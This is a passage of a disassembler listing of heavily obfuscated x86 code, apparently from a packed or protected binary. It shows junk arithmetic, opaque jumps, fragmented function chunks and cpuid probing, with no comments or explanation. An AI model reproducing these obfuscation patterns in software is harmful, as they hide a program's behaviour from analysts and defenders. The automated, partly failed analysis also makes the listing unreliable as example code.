or esi, 0F6397631h
jmp sub_42D232
; ---------------------------------------------------------------------------
loc_429946: ; DATA XREF: sub_42D84A-6637�o
mov eax, [ebp-4]
loc_429949: ; CODE XREF: _7hdaygc1:004284E8�j
push eax
push 0B2B549AEh
xchg edx, [esp]
mov eax, edx
pop edx
add eax, 792D2838h
and eax, 1BF5C2EBh
jmp loc_42AA0C
; ---------------------------------------------------------------------------
loc_429966: ; CODE XREF: _7hdaygc1:0042F784�j
sbb edx, eax
; =============== S U B R O U T I N E =======================================
sub_429968 proc near ; CODE XREF: _7hdaygc1:0042F45B�p
; FUNCTION CHUNK AT 004237ED SIZE 00000003 BYTES
; FUNCTION CHUNK AT 004246CC SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [eax]
add eax, [ebp-4]
jmp loc_4246CC
sub_429968 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_429976: ; CODE XREF: sub_425C3B:loc_42A03E�j
jnz loc_42487A
loc_42997C: ; CODE XREF: _7hdaygc1:0042AE88�j
jmp nullsub_137
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
adc edx, edi
ror ebx, 17h
jmp loc_42487A
; ---------------------------------------------------------------------------
loc_42998B: ; DATA XREF: sub_42C443:loc_42CFA9�o
mov [ecx], eax
pop ecx
locret_42998E: ; CODE XREF: _7hdaygc1:0042833D�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426471
loc_42998F: ; CODE XREF: sub_426471:loc_4250D6�j
jmp nullsub_205
; END OF FUNCTION CHUNK FOR sub_426471
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_429994: ; CODE XREF: sub_42AFFE-760C�j
jmp loc_42DC75
; END OF FUNCTION CHUNK FOR sub_42AFFE
; =============== S U B R O U T I N E =======================================
sub_429999 proc near ; CODE XREF: sub_424AA8:loc_42879C�p
; sub_428E3C+D�j ...
call sub_42948A
loc_42999E: ; CODE XREF: sub_42A94C+544E�j
jmp nullsub_23
sub_429999 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AD16
loc_4299A3: ; CODE XREF: sub_42AD16:loc_428298�j
add eax, 3AF8D10Eh
xor edx, edx
push offset loc_423E6B
jmp loc_42F745
; END OF FUNCTION CHUNK FOR sub_42AD16
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_4299B5: ; CODE XREF: sub_423DFC:loc_429B63�j
mov eax, [eax]
add eax, [ebp-10h]
mov [ebp-10h], eax
add dword ptr [ebp-4], 4
push 5879E87Bh
jmp loc_4246A1
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
push ecx
push 8C024FA1h
pop ecx
or ecx, 0D70FD466h
sub ecx, 0A7E4EC93h
and ecx, 801C04CDh
add ecx, 3ABC1Ch
call sub_426008
; START OF FUNCTION CHUNK FOR sub_425F27
loc_4299EF: ; CODE XREF: sub_425F27+A80�j
jmp loc_42EA39
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4F1
loc_4299F4: ; CODE XREF: sub_42A4F1:loc_42DA96�j
jz loc_42638E
jmp loc_4251E8
; END OF FUNCTION CHUNK FOR sub_42A4F1
; ---------------------------------------------------------------------------
test edx, 3B3C4A0Ch
jmp loc_424F29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_429A0A: ; CODE XREF: sub_42AA9B+7�j
mov eax, offset dword_42BC4C
call sub_427D8E
cmp ds:dword_42BC58, 0
loc_429A1B: ; CODE XREF: _7hdaygc1:loc_427F32�j
jnz loc_42D2C2
jmp loc_423304
; END OF FUNCTION CHUNK FOR sub_42AA9B
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_429A26 proc near ; DATA XREF: sub_42F7BE+1�o
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00427ED3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C874 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E648 SIZE 00000027 BYTES
mov ebp, esp
add esp, 0FFFFFFECh
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
jmp loc_42C874
sub_429A26 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_429A39: ; CODE XREF: _7hdaygc1:0042477F�j
; sub_42AA47:loc_42492A�j
xor eax, 45FE6148h
add eax, ebp
add eax, 0C9EBD319h
mov eax, [eax]
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
jmp loc_423B83
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A052
loc_429A54: ; CODE XREF: sub_42A052-3C2D�j
adc ebx, 0EC9C8B5Ch
loc_429A5A: ; CODE XREF: sub_42A052:loc_424809�j
push edi
push 4C07E8C3h
pop edi
and edi, 8C91A6AAh
or edi, 99DDF87Fh
jmp loc_42CBB5
; END OF FUNCTION CHUNK FOR sub_42A052
; ---------------------------------------------------------------------------
loc_429A72: ; CODE XREF: _7hdaygc1:00429E97�j
lea eax, [ebp-0Ch]
push 6905EA6Eh
pop ecx
rol ecx, 2
xor ecx, 8509C431h
add ecx, ebp
jmp loc_428E96
; ---------------------------------------------------------------------------
loc_429A8B: ; CODE XREF: _7hdaygc1:loc_426D06�j
jge loc_4247EB
xor eax, 5E753171h
jmp loc_4247E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB9F
loc_429A9C: ; CODE XREF: _7hdaygc1:00426B9D�j
; sub_42AB9F-319�j
add eax, 0C0ED829Eh
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
add [esi], eax
xor [esi], ebx
loc_429AAE: ; CODE XREF: _7hdaygc1:loc_42F392�j
add [esi], ecx
jmp loc_42392E
; END OF FUNCTION CHUNK FOR sub_42AB9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_429AB5: ; CODE XREF: sub_42E283:loc_42A7DF�j
jnz loc_42A270
jmp loc_42C090
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
loc_429AC0: ; CODE XREF: _7hdaygc1:loc_42E6CB�j
pop edx
and edx, 0C90C9D50h
sub edx, 4FFE7E5Bh
or edx, 0B265BC6Fh
add edx, 4ABCF17Bh
add edx, ebp
add edx, 0BAD55082h
mov edx, [edx]
jmp loc_42F27D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCDD
loc_429AE8: ; CODE XREF: sub_42CCDD:loc_4262AF�j
add eax, 0FF3F7E34h
mov eax, [eax]
or eax, eax
jnz loc_42D7D4
jmp loc_429380
; END OF FUNCTION CHUNK FOR sub_42CCDD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_429AFD: ; CODE XREF: sub_42D9E1-58FF�j
; sub_42D9E1:loc_4289C1�j
call sub_42D757
push 0C75BB2F0h
pop edx
or edx, 0A58B0947h
cmp edx, 0E536CB9Ah
jmp loc_42C6BF
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D245
loc_429B19: ; CODE XREF: sub_42D245-2B87�j
jnz loc_4242FC
mov eax, [ebp-8]
shl eax, 3
add [ebp-8], eax
mov eax, [ebp-8]
call sub_4260B4
loc_429B30: ; CODE XREF: sub_42A104+4FAB�j
jmp loc_42E605
; END OF FUNCTION CHUNK FOR sub_42D245
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_153. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_429B36 proc near ; DATA XREF: _7hdaygc1:0042E5ED�o
inc dword ptr [ebp-4]
jmp loc_4230AB
sub_429B36 endp
; =============== S U B R O U T I N E =======================================
sub_429B3E proc near ; CODE XREF: sub_42ED2A:loc_4230A3�p
mov eax, 0AAh
retn
sub_429B3E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426941
loc_429B44: ; CODE XREF: sub_426941+6�j
jmp nullsub_24
; END OF FUNCTION CHUNK FOR sub_426941
; =============== S U B R O U T I N E =======================================
sub_429B49 proc near ; CODE XREF: sub_425F27-2F02�p
; sub_42409E+8�p ...
; FUNCTION CHUNK AT 00423B79 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423FDC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042893E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042FC44 SIZE 00000022 BYTES
jno loc_42893E
push ebp
mov ebp, esp
push ecx
call sub_429766
loc_429B58: ; CODE XREF: sub_425E64+D76�j
jmp loc_423FDC
sub_429B49 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424744
loc_429B5D: ; CODE XREF: sub_424744:loc_42BC6D�j
jge loc_429884
; END OF FUNCTION CHUNK FOR sub_424744
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_429B63: ; CODE XREF: sub_423DFC+1C7A�j
jmp loc_4299B5
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
push 63DBCB3Fh
jns loc_428D25
jmp loc_429884
; ---------------------------------------------------------------------------
push eax
push esi
push 0CEDA5FFBh
pop esi
rol esi, 1Eh
jnb loc_42E883
; START OF FUNCTION CHUNK FOR sub_425008
loc_429B89: ; CODE XREF: sub_425008+8F3�j
jmp loc_42689C
; END OF FUNCTION CHUNK FOR sub_425008
; ---------------------------------------------------------------------------
jo loc_42DDFE
adc ecx, 0CC943D3Bh
jmp loc_42E87C
; ---------------------------------------------------------------------------
locret_429B9F: ; CODE XREF: _7hdaygc1:loc_4252D8�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_429BA0: ; CODE XREF: sub_424963:loc_42524A�j
mov eax, [ebp-14h]
loc_429BA3: ; CODE XREF: _7hdaygc1:0042C2FB�j
push offset loc_42D25F
jmp loc_42FB9E
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_429BAD: ; CODE XREF: sub_425C3B:loc_423E43�j
call sub_42A1B6
loc_429BB2: ; CODE XREF: _7hdaygc1:0042CEB4�j
test esi, 1000000h
jmp loc_42CF16
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_429BBD: ; CODE XREF: sub_4232DA:loc_42D42F�j
pop ebx
loc_429BBE: ; CODE XREF: _7hdaygc1:00426D59�j
; sub_427D11+18�j ...
push edi
mov edi, ebp
xchg edi, [esp+4+var_4]
jmp loc_427CA9
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_429BC9: ; CODE XREF: sub_423172:loc_42CAD7�j
or eax, 22320440h
loc_429BCF: ; CODE XREF: _7hdaygc1:004285DB�j
jmp loc_424C8B
; END OF FUNCTION CHUNK FOR sub_423172
; =============== S U B R O U T I N E =======================================
sub_429BD4 proc near ; DATA XREF: _7hdaygc1:loc_4285D1�o
push eax
mov eax, [ebp-18h]
loc_429BD8: ; CODE XREF: sub_42CC76:loc_424D96�j
call sub_42F436
loc_429BDD: ; CODE XREF: _7hdaygc1:0042D58F�j
jmp nullsub_207
sub_429BD4 endp
; ---------------------------------------------------------------------------
loc_429BE2: ; CODE XREF: _7hdaygc1:0042CCCD�j
jmp loc_42ABB3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_129. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BA2C
loc_429BE8: ; CODE XREF: sub_42BA2C+3�j
jmp loc_42578C
; END OF FUNCTION CHUNK FOR sub_42BA2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_429BED: ; CODE XREF: sub_424AE1+56CF�j
jmp loc_42F0BA
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E254
loc_429BF2: ; CODE XREF: sub_42E254-61E2�j
jmp nullsub_100
; END OF FUNCTION CHUNK FOR sub_42E254
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_429BF7: ; CODE XREF: sub_42C443-753E�j
jmp loc_4239BA
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_429BFC: ; CODE XREF: sub_42F65A-567�j
jg loc_42A764
jmp loc_42E8D6
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
loc_429C07: ; DATA XREF: sub_4252F5+4A67�o
add [esi], eax
call sub_423A34
; START OF FUNCTION CHUNK FOR sub_42828C
loc_429C0E: ; CODE XREF: sub_42828C+6�j
jmp loc_42BBD9
; END OF FUNCTION CHUNK FOR sub_42828C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_429C13: ; CODE XREF: sub_425C3B+27FB�j
jnp loc_42A3A7
cdq
jmp loc_426206
; END OF FUNCTION CHUNK FOR sub_425C3B
; =============== S U B R O U T I N E =======================================
sub_429C1F proc near ; CODE XREF: _7hdaygc1:0042EE48�j
; sub_42F56C+1�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042852A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428D57 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042A177 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D54F SIZE 00000005 BYTES
xchg edx, [esp+10h+var_10]
pop edx
push ebp
mov ebp, esi
xchg ebp, [esp+10h+var_10]
push esi
jmp loc_42A177
sub_429C1F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_429C2F: ; CODE XREF: sub_425F27:loc_423907�j
jge loc_42BDBB
loc_429C35: ; CODE XREF: sub_42DE6F-569C�j
jmp nullsub_69
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
pushf
mov esi, 0B81669BCh
cmp esi, edi
jmp loc_42BDAD
; ---------------------------------------------------------------------------
loc_429C47: ; DATA XREF: _7hdaygc1:0042A1CA�o
mov esp, ebp
xchg esi, [esp]
mov ebp, esi
xchg ebp, [esp]
mov esi, ebp
jmp loc_4257B1
; ---------------------------------------------------------------------------
jle loc_4265DD
jmp sub_42F152
; ---------------------------------------------------------------------------
loc_429C63: ; CODE XREF: _7hdaygc1:0042BF76�j
add edx, ebx
xchg edi, esi
sbb esi, ebp
loc_429C69: ; CODE XREF: _7hdaygc1:loc_42422F�j
push 40h
mov eax, [ebp-4]
push eax
push offset sub_426606
jmp loc_4245AD
; ---------------------------------------------------------------------------
push ecx
push 0BC100868h
loc_429C7F: ; CODE XREF: _7hdaygc1:00429794�j
xchg ebx, [esp]
mov ecx, ebx
pop ebx
jmp loc_426F17
; ---------------------------------------------------------------------------
mov [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 0FFFFFFFFh
jz loc_42F171
jmp loc_42422F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4242E0
loc_429C9C: ; CODE XREF: sub_4242E0:loc_42C98B�j
pop eax
sub eax, 6915CA03h
or eax, 8C8215EBh
xor eax, 0BEDAB7FFh
xchg eax, [esp+0]
push offset sub_426DD9
jmp nullsub_49
; END OF FUNCTION CHUNK FOR sub_4242E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DBF7
loc_429CBC: ; CODE XREF: sub_42DBF7+1E2C�j
call sub_42AA07
lea eax, [ebp+var_14]
push eax
call sub_429B49
jmp loc_4294AA
; END OF FUNCTION CHUNK FOR sub_42DBF7
; =============== S U B R O U T I N E =======================================
sub_429CCF proc near ; DATA XREF: sub_424E7E+4741�o
; FUNCTION CHUNK AT 0042E1A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F888 SIZE 0000000C BYTES
xor esi, 0C145B4ACh
add esi, ebp
add esi, 60F88B1Fh
mov [esi], eax
xchg ebp, [esp+0]
jmp loc_42E1A8
sub_429CCF endp
; ---------------------------------------------------------------------------
loc_429CE7: ; DATA XREF: _7hdaygc1:loc_42CAFC�o
call sub_42D757
mov edx, 3CC6743Ch
call sub_42C1AF
push eax
ror eax, 18h
mov ds:dword_42E18C, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D8AF
loc_429D01: ; CODE XREF: sub_42D8AF+7�j
jmp sub_42C16F
; END OF FUNCTION CHUNK FOR sub_42D8AF
; ---------------------------------------------------------------------------
loc_429D06: ; CODE XREF: _7hdaygc1:00426CED�j
rol eax, 18h
jmp loc_42E272
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_429D0E: ; CODE XREF: sub_42AA07-6EC5�j
mov eax, [eax]
loc_429D10: ; CODE XREF: _7hdaygc1:0042D14C�j
push eax
call sub_42B9CE
loc_429D16: ; CODE XREF: sub_42CD1F+10�j
jmp loc_42A828
; END OF FUNCTION CHUNK FOR sub_42AA07
; =============== S U B R O U T I N E =======================================
sub_429D1B proc near ; DATA XREF: _7hdaygc1:loc_42DF37�o
; FUNCTION CHUNK AT 00424804 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424FC5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042C16A SIZE 00000005 BYTES
mov eax, 1
xor ebx, ebx
xor edx, edx
cpuid
and eax, 2FFFh
loc_429D2B: ; CODE XREF: _7hdaygc1:0042DA9E�j
jmp loc_42C16A
sub_429D1B endp
; ---------------------------------------------------------------------------
loc_429D30: ; CODE XREF: _7hdaygc1:004266AA�j
jz loc_42D84D
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_429D36: ; CODE XREF: sub_42BAE7:loc_423123�j
add ecx, 0EADACBFCh
xchg ecx, [esp+0]
jmp sub_424BE6
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
loc_429D44: ; CODE XREF: _7hdaygc1:loc_42932E�j
; _7hdaygc1:0042E037�j
push offset loc_42EB94
jmp locret_42454A
; ---------------------------------------------------------------------------
loc_429D4E: ; CODE XREF: _7hdaygc1:00424003�j
push ecx
jmp sub_425459
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4252F5
loc_429D54: ; CODE XREF: sub_4252F5:loc_4252FA�j
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
push offset loc_429C07
jmp nullsub_26
; END OF FUNCTION CHUNK FOR sub_4252F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_429D66: ; CODE XREF: sub_423648:loc_42F142�j
test byte ptr [ebp-8], 2
jz loc_42362D
push ebp
mov eax, [ebp-20h]
call sub_42F7BE
pop ecx
mov [ebp-20h], eax
loc_429D7D: ; CODE XREF: _7hdaygc1:0042B072�j
jmp loc_42362D
; ---------------------------------------------------------------------------
loc_429D82: ; CODE XREF: sub_423648:loc_42F13C�j
test byte ptr [ebp-8], 2
jmp loc_42361A
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C4
loc_429D8B: ; CODE XREF: sub_42F8C4-94DB�j
; sub_42F8C4:loc_42977C�j
push 0DCDA0B05h
pop eax
sub eax, 2616B030h
add eax, 0D8E3C601h
and eax, 2CF70ADDh
or eax, 0DE660C44h
add eax, 0AAE4D2EBh
jmp loc_4297E3
; END OF FUNCTION CHUNK FOR sub_42F8C4
; ---------------------------------------------------------------------------
pushf
jmp loc_42F654
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_429DBA: ; CODE XREF: sub_423172+AE59�j
call sub_42F1C6
; END OF FUNCTION CHUNK FOR sub_423172
; START OF FUNCTION CHUNK FOR sub_425A37
loc_429DBF: ; CODE XREF: sub_425A37+58�j
add dword ptr [esi], 0F80586h
call sub_42F9D2
loc_429DCA: ; DATA XREF: sub_428B11:loc_4295D5�o
push 39835Ch
mov eax, ebx
jmp loc_424DB3
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_429DD6: ; CODE XREF: sub_4291EA+37AC�j
test ebp, 90E737F0h
jmp loc_4254DA
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
loc_429DE1: ; CODE XREF: _7hdaygc1:0042AD06�j
jge loc_42F37D
loc_429DE7: ; CODE XREF: _7hdaygc1:00426661�j
jmp loc_4268EB
; ---------------------------------------------------------------------------
jb loc_42CB08
jmp loc_42F378
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E9F
loc_429DF7: ; CODE XREF: sub_429E9F+7�j
xchg esi, [esp+0]
push 0BEBF6BB8h
pop edx
and edx, 0E84C070Eh
sub edx, 0F779AABCh
jnz loc_42888E
cdq
jmp loc_42888C
; END OF FUNCTION CHUNK FOR sub_429E9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD11
loc_429E18: ; CODE XREF: sub_42FD11-8F6E�j
mov esi, [ecx]
rol ebx, 1Bh
or ecx, ebp
jmp loc_42EC3C
; END OF FUNCTION CHUNK FOR sub_42FD11
; ---------------------------------------------------------------------------
add ebp, 0D1DFAC76h
jmp sub_427CC6
; ---------------------------------------------------------------------------
loc_429E2F: ; CODE XREF: _7hdaygc1:004294A5�j
jnz loc_42E2C0
; =============== S U B R O U T I N E =======================================
sub_429E35 proc near ; CODE XREF: sub_42524F:loc_4273B8�p
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
xchg eax, [esp-4+arg_0]
jmp nullsub_2
sub_429E35 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
popf
jno loc_42BE3E
jmp sub_425D65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A2B
loc_429E4D: ; CODE XREF: sub_424A2B:loc_424A33�j
test ecx, 20000h
jmp loc_42C2F0
; END OF FUNCTION CHUNK FOR sub_424A2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_429E58: ; CODE XREF: sub_42CFDA:loc_428A9C�j
popf
call sub_42A94C
push 1A2B7CDDh
loc_429E63: ; CODE XREF: _7hdaygc1:0042356F�j
pop edx
jmp loc_424850
; END OF FUNCTION CHUNK FOR sub_42CFDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_429E69: ; CODE XREF: sub_42BAE7:loc_42476C�j
mov [ebp+0], edx
or ecx, 6E5F436Ch
jg loc_42F65D
jmp loc_429385
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
loc_429E7D: ; CODE XREF: _7hdaygc1:00425E1C�j
and edx, 6D0F103Ah
add edx, 398DAD65h
add edx, ebp
add edx, 5E664259h
mov [edx], eax
pop edx
mov edx, [ebp-4]
jmp loc_429A72
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F291
loc_429E9C: ; CODE XREF: sub_42F291+59C�j
shr edi, 1Ah
; END OF FUNCTION CHUNK FOR sub_42F291
; =============== S U B R O U T I N E =======================================
sub_429E9F proc near ; CODE XREF: sub_425C3B:loc_42620C�p
; FUNCTION CHUNK AT 0042888C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00429DF7 SIZE 00000021 BYTES
xchg eax, [esp+0]
pop eax
push esi
mov esi, edx
jmp loc_429DF7
sub_429E9F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425492
loc_429EAB: ; CODE XREF: sub_425492-1605�j
or eax, ds:4000F9h
push offset loc_4263C7
jmp loc_42AE74
; END OF FUNCTION CHUNK FOR sub_425492
; =============== S U B R O U T I N E =======================================
sub_429EBB proc near ; CODE XREF: sub_42EBD6-6471�p
; FUNCTION CHUNK AT 00425F53 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00426711 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E496 SIZE 00000009 BYTES
xchg edi, [esp+0]
pop edi
push eax
push 885E995Dh
pop eax
jmp loc_425F53
sub_429EBB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_429ECB: ; CODE XREF: _7hdaygc1:loc_4242AC�j
push offset loc_42D70C
jmp loc_423DA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_429ED5: ; CODE XREF: sub_425F27-2EEB�j
jz loc_428E17
jmp loc_423168
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E973
loc_429EE0: ; CODE XREF: sub_42E973-A834�j
rol ecx, 1Ch
add ecx, 6DFD78DFh
add eax, ecx
pop ecx
push edx
loc_429EED: ; CODE XREF: _7hdaygc1:0042D0E6�j
; _7hdaygc1:0042E8ED�j
pushf
jmp loc_42C14E
; END OF FUNCTION CHUNK FOR sub_42E973
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F03C
loc_429EF3: ; CODE XREF: sub_42F03C+1�j
mov ebp, esp
push ecx
call sub_42E695
loc_429EFB: ; CODE XREF: _7hdaygc1:0042E5F2�j
jmp nullsub_109
; END OF FUNCTION CHUNK FOR sub_42F03C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_429F00: ; CODE XREF: sub_429318+1192�j
jmp loc_42C07B
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
loc_429F05: ; CODE XREF: _7hdaygc1:0042B1EF�j
; _7hdaygc1:loc_42DFD0�j
push edi
push 98AF17ECh
pop edi
add edi, 0E80DAF5Eh
jmp loc_42E9F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_429F17: ; CODE XREF: sub_424AE1+1BA6�j
or eax, 204B38E8h
cmp eax, 45302B1Dh
jmp loc_4253E0
; END OF FUNCTION CHUNK FOR sub_424AE1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_160. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42986C
loc_429F29: ; CODE XREF: sub_42986C-2AB9�j
jmp loc_423285
; END OF FUNCTION CHUNK FOR sub_42986C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_194. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_429F2F: ; CODE XREF: sub_424F62+5798�j
push 3E51C7DBh
pop esi
add esi, 0A5F08E7Eh
sub esi, 82EBC574h
xor esi, 0F40E1CFEh
and esi, 5C517B19h
loc_429F4D: ; CODE XREF: _7hdaygc1:0042C1BE�j
jmp loc_42C60D
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42986C
loc_429F52: ; CODE XREF: sub_42986C:loc_42CAAF�j
mov eax, [eax]
jnz loc_429873
retn
; ---------------------------------------------------------------------------
loc_429F5B: ; CODE XREF: sub_42986C:loc_429873�j
cmp dword ptr [eax], 0FFFFFFFFh
jmp loc_42D2CC
; END OF FUNCTION CHUNK FOR sub_42986C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_429F63: ; CODE XREF: sub_425B78:loc_4281BF�j
; sub_424CE0:loc_42E1DD�j
call sub_42862C
jo loc_42A72F
jmp sub_42826A
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
loc_429F73: ; CODE XREF: _7hdaygc1:0042FAB1�j
sbb esi, 9AA67BF1h
mov eax, edi
and esi, 5235ECFBh
sbb ecx, 9B1782EDh
jmp loc_4289A6
; ---------------------------------------------------------------------------
loc_429F8C: ; CODE XREF: _7hdaygc1:0042AEDC�j
mov ebx, 0BFA6ACBCh
jmp loc_42618A
; ---------------------------------------------------------------------------
loc_429F96: ; DATA XREF: sub_42BAD5-5AF3�o
mov eax, [ebp-44h]
mov eax, [eax+14h]
mov edx, [ebp-44h]
jb loc_425A7B
add eax, [edx+10h]
push ebx
push 0F8263FC9h
jmp loc_428A5E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423812
loc_429FB3: ; CODE XREF: sub_423812:loc_4235F8�j
; _7hdaygc1:00423615�j
add esi, 89A49F4Bh
push offset sub_4296EF
jmp nullsub_219
; END OF FUNCTION CHUNK FOR sub_423812
; =============== S U B R O U T I N E =======================================
sub_429FC3 proc near ; CODE XREF: _7hdaygc1:00424CFF�j
; sub_423DDB+8A0E�p
; FUNCTION CHUNK AT 004252E2 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00426639 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042EE3D SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
call sub_429B49
mov [ebp-4], eax
jmp loc_42EE3D
sub_429FC3 endp ; sp-analysis failed
